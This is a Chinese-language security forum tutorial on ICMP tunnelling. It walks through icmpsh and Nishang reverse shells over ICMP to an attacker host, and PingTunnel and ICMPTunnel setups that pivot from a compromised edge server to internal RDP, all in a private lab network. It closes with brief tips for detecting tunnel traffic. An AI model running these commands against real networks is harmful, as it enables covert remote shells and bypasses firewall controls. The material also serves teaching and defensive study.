深入探讨ICMP隧道工具及防御策略-山海云端论坛

ICMP隧道简介

ICMP是一个比较特殊的协议，在一般的通信协议里如果两台设备要进行通信，肯定需要开放端口，而在ICMP协议下就不需要，最常见的ICMP消息为ping命令的回复，攻击者可以利用命令行得到比回复更多的ICMP请求，在通常情况下，每个ping命令都有相对应的回复与请求

在一些内部网络环境中，大部分系统都位于防火墙和公司代理之后以便控制入站和出站Internet流量，防火墙可以阻止反向并绑定TCP连接，但是大多数情况下允许ICMP流量，因此，可以将此协议用作隐蔽通道，以便获取shell并在目标主机上远程执行命令

ICMP隧道使用

常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。

icmpsh

工具安装

icmpsh工具使用简单，便于”携带”(跨平台)，运行时不需要管理员权限，我们首先通过Git clone命令下载icmpsh：

git clone https://github.com/inquisb/icmpsh.git

之后我们需要安装python的impacket类库，以便于对TCP、UDP、ICMP、IGMP、ARP、IPv4、IPv6、SMB、MSRPC、NTLM、Kerberos、WMI、LDAP等协议进行访问：

apt-get install python-impacket

工具使用

因为icmpsh工具要代替系统本身的ping命令的应答程序，所以需要输入以下命令来关闭本地系统的ICMP应答(如果需要回复系统应答，则设置为0即可)，否则shell的运行会不稳定(表现为一直刷屏，无法进行交互输入)：

sysctl -w net.ipv4.icmp_echo_ignore_all=1

之后我们在终端执行以下命令来查看icmpsh的使用方法：

python icmpsh_m.py -h

之后根据脚本使用方法在终端执行以下命令：

python icmpsh_m.py 192.168.188.129 192.168.188.128

之后在边界Web主机(192.168.188.128)上执行以下命令：

icmpsh.exe -t 192.168.188.129(AttackIP)

之后在攻击者主机上可以看到目标主机的shell：

Powershell版本

Nishang框架

Nishang框架包含了一个PowerShell模块，可以与icmpsh的python脚本结合使用，以获得ICMP上的shell

Powershell使用

在攻击主机上执行以下命令将等待任何传入的ICMP数据包：

python icmpsh_m.py 192.168.188.129 192.168.188.128

之后在边界Web主机上通过powershell执行以下命令：

Import-Module .\Invoke-PowerShellIcmp.ps1
Invoke-PowerShellIcmp 192.168.188.129

之后攻击主机汇总接受到连接：

PingTunnel(C)

工具介绍

PingTunnel是一款常用的ICMP隧道工具，可以跨平台使用，为了避免隧道被滥用，可以为隧道设置密码。

工具安装

a.安装libpcap的依赖环境

apt-get install byacc
apt-get install flex bison

b、安装libpcap依赖库

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar -xzvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
make && make install

c、安装PingTunnel

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install

工具使用

网络环境：

攻击主机(VPS)：192.168.188.129
攻击主机(Windows 10)：192.168.188.1
内网边界主机(Kali linux)：192.168.188.134、192.168.23.131
内网目标主机(Windows 7)：192.168.23.128

网络拓扑：

网络关系：Web服务器模拟企业对外提供Web服务的机器，该机器可以通内网，同时向公网提供服务，内网存在一台Windows 7机器，Web服务器可以与该机器连接。

测试目标：假定现在我们获取到了边界Web服务器的权限，之后想用ICMP搭建通往内网的隧道，连接内网Windows Server 2008 R2的3389端口

测试步骤：

在内网Web边界服务器执行以下指令：

ptunnel -x al1ex  // -x 指定连接密码

之后在攻击主机上执行以下命令：

指令格式：ptunnel -p 边界Web主机IP -lp 1080 -da Web服务器内网的其他主机IP -dp 3389 -x al1ex
指令示例：./ptunnel -p 192.168.188.134 -lp 1080 -da 192.168.23.128 -dp 3389 -x al1ex
指令解释：上述指令的含义是指在访问攻击者VPS(192.168.188.129)的1080端口时，会吧数据库服务器192.168.23.12的3389端口的数据
         封装在ICMP隧道里，以Web服务器182.168.188.134为ICMP隧道跳板进行传送

PingTunnel(Go)

工具介绍

该工具是PingTunnel Go语言版本，同样它也是一款ICMP隧道工具，可以跨平台使用，常用的网络场景如下所示：

工具使用

首先下载PingTunnel对应的安装包

https://github.com/esrrhs/pingtunnel/releases

之后禁用边界主机的icmp回复

echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

之后在边界服务器端启动服务端：

./pingtunnel -type server

之后在攻击主机上启动客户端，客户端支持以下格式：

转发Sock5：

pingtunnel.exe -type client -l :4455 -s www.yourserver.com -sock5 1

转发TCP：

pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1

转发UDP:

pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455

Icmptunnel

工具介绍

ICMPTunnel是一个使用python编写的简易脚本，该工具主要用于创建一个反向的ICMP隧道用于转发TCP通信数据包，这在内网中有时候也会很有帮助，且该工具具有一定的免杀效果~

工具使用

首先去Github下载项目：

https://github.com/T3rry7f/ICMPTunnel

之后在拿到权限的边界服务器端禁用icmp回复：

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

之后执行IcmpTunnel.py脚本：

python IcmpTunnel_S.py

之后再攻击主机执行以下命令：

python IcmpTunnel_C.py {serverIP} {needConnectIP} {needConnectPort}

之后在边界Server端返回一个port并在攻击主机端使用返回的port进行远程连接，此时的ip为边界服务器的ip地址：

rdesktop 192.168.188.131:44171

隧道防御

使用ICMP隧道时会产生大量的ICMP数据包，我们可以通过Wireshark进行ICMP数据包分析，以检测恶意ICMP流量，具体方法如下：

检测同一来源的ICMP数据包的数量，一个正常的ping命令每秒最多发送两个数据包，而使用ICMP隧道的浏览器会在很短的时间内产生上千个ICMP数据包
注意哪些Payload大于64bit的ICMP数据包
寻找响应数据包中的Payload与请求数据包中的Payload不一致的ICMP数据包。
检查ICMP数据包的协议标签，例如：icmptunnel会在所有的ICMP Payload前面添加”TUNL”标记来标识隧道——这就是特征。

版权声明 1 本网站名称：山海云端-专注于PHP与网络安全
2 本站永久网址：www.shserve.cn
3 本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长 QQ1790643379进行删除处理。
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END